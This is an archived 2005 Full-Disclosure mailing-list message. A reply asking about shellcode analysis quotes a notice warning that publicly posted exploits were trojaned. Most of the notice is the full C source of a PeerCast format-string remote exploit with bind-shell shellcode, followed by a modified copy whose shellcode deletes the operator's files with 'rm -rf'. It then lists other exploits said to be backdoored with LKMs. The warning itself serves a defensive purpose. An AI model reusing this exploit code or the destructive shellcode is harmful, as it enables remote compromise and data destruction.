lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <5598cfa1050726224930960f5a@mail.gmail.com> Date: Wed Jul 27 06:50:06 2005 From: mark.sec at gmail.com (Mark Sec) Subject: Beware trojaned exploits! Yep, many exploits/shellcodes are "fake" on the wild , but does anyone have a tools to verify the shellcodes "public or 0days" online or sources codes? something like "reverse shellcode" i belive to see something online where u put the shellcode and them u see the "action" that u shellcode have. does anyone have something? cheers :-) /mark On 27/07/05, securitymarket@...h.ai <securitymarket@...h.ai> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hackers may be at risk! > > It has come to our attention that a large amount of public > security exploits/software have been modified and re-posted > to legitimate trusted information sites for public downloads. > > We have recently came across 5 exploits that have had a shellcode > modification > after legit verification of trusted download sites. > > The following information security sites have listed a number of > modified exploits: > > unl0ck security research > g0tfault security > m00 security > > Unl0ck was recently broken into by a anti-security/hacker > organization > named dikline (dikline.com ?) and ALL exploit sources were modified > in different > ways to infect the host attempting to exploit them. > > Numerous modified sources of "internal" / "0day" sources by a > security group named "m00 security" have also been reported as > modified by > the dikline organization. > > We have audited numerous public exploit code's and have come up > with some interesting > results. The following is a clear example of modified shellcode to: > > Original shellcode of the exploit "p33r-b33r.c" by unl0ck: > > > /* > \ PeerCast <= 0.1211 remote format string exploit > / [<< Public Release >>] > \ > / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ] > \ > / uKt researcherz [ http://unl0ck.org ] > \ > / greetz goes to: uKt researcherz. > \ > / > \ - smallest code - better code!!! > / > */ > > #include <stdio.h> > #include <stdlib.h> > #include <stdarg.h> > #include <string.h> > #include <sys/types.h> > #include <sys/socket.h> > #include <netinet/in.h> > #include <arpa/inet.h> > #include <unistd.h> > #include <netdb.h> > > > //******************************************* > #define doit( b0, b1, b2, b3, addr ) { \ > b0 = (addr >> 24) & 0xff; \ > b1 = (addr >> 16) & 0xff; \ > b2 = (addr >> 8) & 0xff; \ > b3 = (addr ) & 0xff; \ > } > //******************************************* > > //**************************************************************** > char shellcode[] = // binds 4444 port > "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85" > "\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5" > "\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c" > "\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c" > "\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86" > "\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7" > "\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f"; > //**************************************************************** > > > //**************************** > #define HOST "127.0.0.1" > #define PORT 7144 > #define GOTADDR 0x0809da9c > #define SHELLADDR 0x49adb23c > //**************************** > > > > //****************************************************************** > ***** > char * > evil_builder( unsigned int retaddr, unsigned int offset, unsigned > int base, long figure ) > { > char * buf; > unsigned char b0, b1, b2, b3; > int start = 256; > > doit( b0, b1, b2, b3, retaddr ); > buf = (char *)malloc(999); > memset( buf, 0, 999 ); > > b3 -= figure; > b2 -= figure; > b1 -= figure; > b0 -= figure; > > snprintf( buf, 999, > "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n", > b3 - 16 + start - base, offset, > b2 - b3 + start, offset + 1, > b1 - b2 + start, offset + 2, > b0 - b1 + start, offset + 3 ); > > return buf; > } > //****************************************************************** > ******* > > > > > //****************************************************************** > ******* > int > main( int argc, char * argv[] ) > { > struct sockaddr_in addr; > int sock; > char * fmt; > char endian[31337], da_shell[31337]; > unsigned long locaddr, retaddr; > unsigned int offset, base; > unsigned char b0, b1, b2, b3; > > system("clear"); > printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit > ^*^*^*\n"); > printf("*^*^*^ by Darkeagle ^*^*^*\n"); > printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n"); > > memset( endian, 0x00, 31337 ); > memset( da_shell, 0x00, 31337 ); > > addr.sin_family = AF_INET; > addr.sin_port = htons(PORT); > addr.sin_addr.s_addr = inet_addr(HOST); > > sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); > > locaddr = GOTADDR; > retaddr = SHELLADDR; > offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will > get AAAA41414141 > > doit( b0, b1, b2, b3, locaddr ); > > base = 4; > printf("[*] Buildin' evil code\n"); > strcat(endian, "GET /html/en/index.html"); > snprintf( endian+strlen(endian), sizeof(endian), > "%c%c%c%c" > "%c%c%c%c" > "%c%c%c%c" > "%c%c%c%c", > b3, b2, b1, b0, > b3 + 1, b2, b1, b0, > b3 + 2, b2, b1, b0, > b3 + 3, b2, b1, b0 ); > > fmt = evil_builder( retaddr, offset, base, 0x10 ); > > memset(fmt+strlen(fmt), 0x55, 32); > strcat(fmt, shellcode); > strcat(endian, fmt); > strcat(endian, "\r\n\r\n\r\n"); > printf("[+] Buildin' complete!\n"); > sprintf(da_shell, "telnet %s 4444", HOST); > > // just go, y0! > printf("[*] Connectin'\n"); > if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { > printf("[-] Connection failed!\n\n"); > exit(0); } > > printf("[+] Connected!\n"); > printf("[*] Sleepin'\n"); > sleep(1); > > printf("[*] Sendin'\n"); > send(sock, endian, strlen(endian), 0); > > printf("[*] Sleepin'\n"); > sleep(1); > > printf("[*] Connectin' in da shell\n\n"); > sleep(1); > system(da_shell); > return 0; > } > > > - ----------- Replaced modified shellcode to rm-rf remote host: > > > /* > \ PeerCast <= 0.1211 remote format string exploit > / [<< Public Release >>] > \ > / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ] > \ > / uKt researcherz [ http://unl0ck.org ] > \ > / greetz goes to: uKt researcherz. > \ > / > \ - smallest code - better code!!! > / > */ > > #include <stdio.h> > #include <stdlib.h> > #include <stdarg.h> > #include <string.h> > #include <sys/types.h> > #include <sys/socket.h> > #include <netinet/in.h> > #include <arpa/inet.h> > #include <unistd.h> > #include <netdb.h> > > > //******************************************* > #define doit( b0, b1, b2, b3, addr ) { \ > b0 = (addr >> 24) & 0xff; \ > b1 = (addr >> 16) & 0xff; \ > b2 = (addr >> 8) & 0xff; \ > b3 = (addr ) & 0xff; \ > } > //******************************************* > > > //**************************************************************** > char shellcode[] = // binds 4444 port > "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d" > "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41" > "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f" > "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44" > "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24" > "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14" > "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0" > "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; > //**************************************************************** > > > The above shellcode is a modified version that was found listed > on the unl0ck security website under downloads days before the > site went down. > > We have audited and found differences in shellcode on the following > code: > > (POSSIBLY MANY MORE) > > unrealmagic.c - shellcode modified to rm -rf /* host > p33r-b33r.c - shellcode modified to rm -rf /* host > 0x666-ftpd.c - shellcode modified to rm -rf /* host > gotfault-htdead.c - shellcode modified to rm -rf /* host > gotfault-lcdproc.c - shellcode modified to install LKM > gotfault-newspost.c - shellcode modified to rm -rf /* host > gotfault-ngircd.c - shellcode modified to rm -rf /* host > gotfault-nwlpstat.c - shellcode modified to rm -rf /* host > gotfault-openftpd-msg.c - shellcode modified to install LKM > gotfault-pbs4q.c - shellcode modified to add password to mail users > gotfault-putty.c - shellcode modified to install LKM > gotfault-realmagicV2.c - shellcode modified to install LKM > gotfault-sing.sh - shellcode modified to install unknown backdoor. > gotfault-vmpsd.c - shellcode modified to rm -rf /* host > gotfault-zebedee.c - shellcode modified to rm -rf /* host > gotfault-zebedee-win32.zip - unknown > gotfault-exim.tar.gz - shellcode modified to rm -rf /* host > gotfault-3cdsmash.c - shellcode modified to install NEW LKM > gotfault-psoproxy.c - shellcode modified to install LKM > gotfault-pcwsd.c - shellcode modified to install LKM > > > This is an urgent notice to all of the security individuals who > have downloaded > any of the above (and more) exploits. Please take note to your > collections > we must find out what this dikline organization has backdoor'd and > fix it! > > *** MAKE SURE to check your shellcode whenever possible. > > -----BEGIN PGP SIGNATURE----- > Note: This signature can be verified at https://www.hushtools.com/verify > Version: Hush 2.4 > > wkYEARECAAYFAkLm90gACgkQPRXecBfP4rZkowCfTvlwuZz3VoO7/fToI0UrhUhygekA > njACLQnU0QQDfXtKglEjX7ko5TdA > =nU9l > -----END PGP SIGNATURE----- > > > > > Concerned about your privacy? Follow this link to get > secure FREE email: http://www.hushmail.com/?l=2 > > Free, ultra-private instant messaging with Hush Messenger > http://www.hushmail.com/services-messenger?l=434 > > Promote security and make money with the Hushmail Affiliate Program: > http://www.hushmail.com/about-affiliate?l=427 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
Powered by blists - more mailing lists